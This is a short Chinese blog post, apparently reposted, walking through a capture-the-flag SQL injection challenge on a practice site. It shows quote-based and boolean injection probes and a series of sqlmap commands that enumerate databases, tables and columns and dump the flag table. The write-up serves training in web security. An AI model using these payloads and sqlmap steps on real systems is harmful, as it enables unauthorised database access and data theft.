首页 > 数据库技术 > 详细

简单的sql注入3

时间:2019-07-19 21:03:15      阅读:92      评论:0      收藏:0      [点我收藏+]

 

 

仍然

1

1’

1”

发现1’报错了。。。。。我觉得作者对’情有独钟

再试试

1#

1’#

1”#

发现都可以正常登录

试试1‘ and ‘1‘=‘11‘ and ‘1‘=‘2发现成功登录和不成功登录的区别在于显示hello不,这里并不会输出id= name=

所以这里应该是个报错型盲注

所以这里就不浪费时间了,直接使用sqlmap

使用

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"

打开开口

技术分享图片

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs

查看数据库表名称

技术分享图片

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables

查询表下的列名称

技术分享图片

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T flag

查询列下的flag类型

技术分享图片

sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -C flag -T flag --dump

查看flag的信息

技术分享图片

 

简单的sql注入3

原文:https://www.cnblogs.com/wosun/p/11215659.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!